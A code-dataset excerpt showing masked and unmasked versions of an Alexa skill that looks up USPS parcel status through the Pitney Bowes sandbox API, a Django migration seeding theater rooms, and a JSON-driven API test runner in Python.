on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n 
oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = 
intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n 
intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-5": "\"\"\"\nCode for Alexa skill to check PB tracking\n\"\"\"\n\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome to PB Parcel Tracker\"\n speech_output = \"Please give first 10 digits of tracking number\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please give first 10 digits of tracking number\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the Alexa Skills Kit sample. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n#----- get tracking ------\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = \"Now give remaining digits\"\n reprompt_text = \"Now give the next eleven numbers\"\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = \"%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print(\"session after adding first ten--->\")\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = \"There was some problem, Please provide first ten digits of the tracking number\"\n reprompt_text = \"Please say first ten digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n#----- get tracking ------\n\ndef getParcelStatus(intent, 
session):\n session_attributes = {}\n should_end_session = True\n speech_output = \"There was some problem in taking your input\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n try:\n tracking_number_11= intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = \"%s%s%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = \"%s%s\" % (session['attributes']['first_ten'], tracking_number)\n bearer = \"Bearer %s\" % (session['access_token'])\n print(\"USPS FULL Tracking Number ----> %s\" % (full_tracking_number))\n url = \"https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS\" %(full_tracking_number)\n r=requests.get(url, headers={\"Authorization\" : bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if(r.status_code == 200):\n speech_output = \"The status of the parcel is \"+tracking_response['status']\n reprompt_text = \"The status of the parcel is \"+tracking_response['status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):\n speech_output = \"Please provide only first ten digits of the tracking number\"\n reprompt_text = \"Please provide only first ten digits of the tracking number\"\n else:\n speech_output = \"There was some problem, Please say remaining digits of the tracking number\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = \"Basic 
\"+access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={\"Authorization\": access_key_value,\n \"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"grant_type\": \"client_credentials\"})\n print(r.status_code)\n if(r.status_code == 200):\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if('access_token' not in session):\n oauth_request(session)\n print(session['access_token'])\n # Dispatch to your skill's intent handlers\n if intent_name == \"Tracking\":\n return setFirstEleven(intent, session)\n elif intent_name == \"TrackingSecond\":\n return getParcelStatus(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
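The third row is an AWS Lambda handler for an Alexa skill that collects a Pitney Bowes tracking number across two intents and then queries the sandbox tracking API. One reading note: `traceback.print_tb` is referenced in the exception handlers without being called, so no traceback is actually printed. For orientation, the sketch below shows the rough shape of an IntentRequest event that `lambda_handler` dispatches on, reconstructed only from the keys the handlers read; every value is a placeholder, not a real Alexa payload.

```python
# Minimal sketch of an event accepted by lambda_handler above, assembled
# only from the keys the handlers read; all values are placeholders.
sample_event = {
    "session": {
        "new": False,
        "sessionId": "SessionId.example",
        "application": {"applicationId": "amzn1.ask.skill.example"},
        "attributes": {"first_ten": "9400100000"},  # set earlier by setFirstEleven
    },
    "request": {
        "type": "IntentRequest",
        "requestId": "EdwRequestId.example",
        "intent": {
            "name": "TrackingSecond",
            "slots": {"Eleven": {"value": "1"}, "Twelve": {"value": "2"}},
            # remaining slots Thirteen through TwentyTwo follow the same shape
        },
    },
}
```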
# Generated by Django 2.2.3 on 2019-07-14 13:34
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model("main", "TheaterRoom")
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([
TheaterRoom(name="Red Room", rows_count=10, seats_per_row_count=15),
TheaterRoom(name="Blue Room", rows_count=20, seats_per_row_count=30),
])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TheaterRoom',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('rows_count', models.IntegerField()),
('seats_per_row_count', models.IntegerField()),
],
),
migrations.RunPython(forwards_func, reverse_func),
]
|
normal
|
{
"blob_id": "a4b61a5a79e314e56ba25c6e2e735bd2ee4ef0d3",
"index": 4551,
"step-1": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-3": "<mask token>\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-4": "from django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-5": "# Generated by Django 2.2.3 on 2019-07-14 13:34\n\nfrom django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model(\"main\", \"TheaterRoom\")\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([\n TheaterRoom(name=\"Red Room\", rows_count=10, seats_per_row_count=15),\n TheaterRoom(name=\"Blue Room\", rows_count=20, seats_per_row_count=30),\n ])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='TheaterRoom',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('rows_count', models.IntegerField()),\n ('seats_per_row_count', models.IntegerField()),\n ],\n ),\n migrations.RunPython(forwards_func, reverse_func),\n ]\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from src.testcase.case import Case
from src.utils import *
from src.protocol.register import get_conn
from src.precondition import *
class OneCase(object):
"""
Main flow of running one case's autotest
"""
PASS = True
FAIL = False
def __init__(self, case_path, *args, **kwargs):
self._case_path = str(case_path)
self._case_dict = {}
self._step_result = []
self._step_msg = []
self._passed = False
def run(self):
self.load_case(self._case_path)
self.satisfy_precondition(self._case_dict)
self.exec_steps(self._case_dict)
self.save_result()
def load_case(self, case_path):
self._case_dict = Case(file_path=case_path).case_dict
def satisfy_precondition(self, case_dict):
pre = case_dict.get('precondition')
if pre:
# pre functions
func_list = pre.get('prefunction')
for func in func_list:
_func = eval(func.get('func_name'))
_args = {_.get('name'): trans_type(_.get('value'), _.get('type')) for _ in func.get('args')}
_func(**_args)
# dependency
check_dependency(pre.get('dependency'))
def check_dependency(self):
pass # ToDo
def exec_steps(self, case_dict):
"""
"""
for step in case_dict.get('step'):
# input
_input = step.get('input')
res = {}
for protocol, _args in _input.iteritems():
req = get_conn(protocol)(**_args)
res = req.response
# compare output
_output = step.get('output')
if _output.get('strict'):
pass # ToDo
try:
for _ in _output.get('expect'):
_var = _.get('var')
_expect_value = trans_type(_['val']['value'], _['val']['type'])
_real_value = res.get(_var)
if _.get('cmp') == '==':
assert _expect_value == _real_value, "Not equal! \n\tExpect: {}\n\tGot: {}".format(
_expect_value, _real_value)
except AssertionError as e:
self._step_result.append(self.FAIL)
self._step_msg.append(e.message)
else:
self._step_result.append(self.PASS)
self._step_msg.append('Passed!')
self._passed = all(self._step_result)
def save_result(self):
"""
save result for this test
1) print to console
2) record to mysql
3) upload to testlink
"""
self.print_to_console()
def print_to_console(self):
if self._passed:
print('All steps passed for case: {}'.format(self._case_dict.get('name')))
else:
err('Failed on case: {}'.format(self._case_dict.get('name')))
step_length = range(1, len(self._step_result) + 1)
for i, result, msg in zip(step_length, self._step_result, self._step_msg):
if result == self.FAIL:
err('Step {} failed for reason:\n\t{}'.format(i, msg))
if __name__ == '__main__':
testcase = OneCase('/Users/eacon/github/APIAutoTestFramework/case/sample.json')
testcase.run()
|
normal
|
{
"blob_id": "f658959bf7fa5e02a577119930c9b9c1ef59f432",
"index": 2845,
"step-1": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n <mask token>\n <mask token>\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if _output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if 